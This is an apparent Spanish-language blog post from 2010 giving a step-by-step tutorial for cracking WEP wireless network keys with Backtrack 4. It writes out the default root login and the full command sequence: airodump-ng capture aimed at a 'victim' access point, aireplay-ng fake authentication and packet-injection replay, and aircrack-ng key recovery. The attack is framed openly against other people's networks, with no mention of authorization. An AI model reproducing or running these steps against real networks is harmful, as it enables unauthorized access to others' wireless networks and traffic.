Demo Site

15 de mayo de 2010

Backtrack 4 Desencriptar CLaves WEP

No podía dejar de postear este tutorial ya que esta el Backtrack 4 .



1.- El Backtrack 4 lo pueden descargar de aquí mismo, bueno empecemos.

Lo primero sera loguearnos como root:

Login : root

Pass : toor

Luego cuando pida comando en el modo texto escribimos startx

2.- Una vez dentro buscamos la aplicacion llamada konsole(la llamaremos en adelante shell) .

3.- Escribimos ifconfig luego, buscaremos tu interfaz de red que puede llamarse wlan0 , rausb , eth0 etc ... y buscas adonde dice hardware address : anotas ese numero . ojo .. el numero llega hasta los 00 del final ...esa es tu dirección mac. luego cierras esa ventana .

4.- Abrimos otra shell y escribimos : airodump-ng wlan0 (tu interfaz de red)
y seleccionas la red a atacar. de ella copias el mac, bssid y el canal . cierras la shell.

5.- Abrimos otra shell y escribimos : airodump-ng -c 6(canal de la victima) -w prueba(Nombre que le quieras dar al archivo de captura) --bssid 66:77:88:99:00:11(mac de la victima) wlan0(tu interfaz de red) , con esto solo te aparecerá el AP(access point) de tu víctima , fijate en donde dice DATA ... esa cifra tiene que llegar por lo menos a 15.000 o mas para comenzar a desencriptar la clave .

6.- Para acelerar este proceso simplemente no manda DATA necesitamos abrir otra shell dejando la anterior abierta . y ahi escribimos : aireplay-ng -1 0 -a 66:77:88:99:00:11(mac del victima) -h 00:11:22:33:44:55(mac tuya) -e ejemplo(bssid de la red que atacamos es decir el nombre) wlan0(tu interfaz de red)

7.- En ese momento deberíamos empezar a recibir DATA mas rapido .. pero en algunos casos demora más porque no hay trafico de red .Luego se este paso podemos acelerar aun mas el proceso infectándole trafico a el router con el siguiente comando :

aireplay-ng -3 -b 66:77:88:99:00:11(mac víctima) -h 00:11:22:33:44:55( tu mac) wlan0(tu interfaz de red)

con eso debería recibir DATA mucho mas rápido. luego cuando tengamos  más de15.000 no cierres la shell y abre otra .

8.- Escribimos ahora aircrack-ng prueba(el nombre que le colocaste  al archivo de capturas)-01.cap


Nota : si comienzan a salir números circulando (hexadecimal) rápido quiere decir que no te alcanzan los data capturados y debes esperar mas . vas intentando hasta que nos diga key found : 44:55:66:77:88 esa seria la clave de tu red inalámbrica y  la copias sin los 2 puntos solo los números(es decir 4455667788) y la ingresas .

0 comentarios: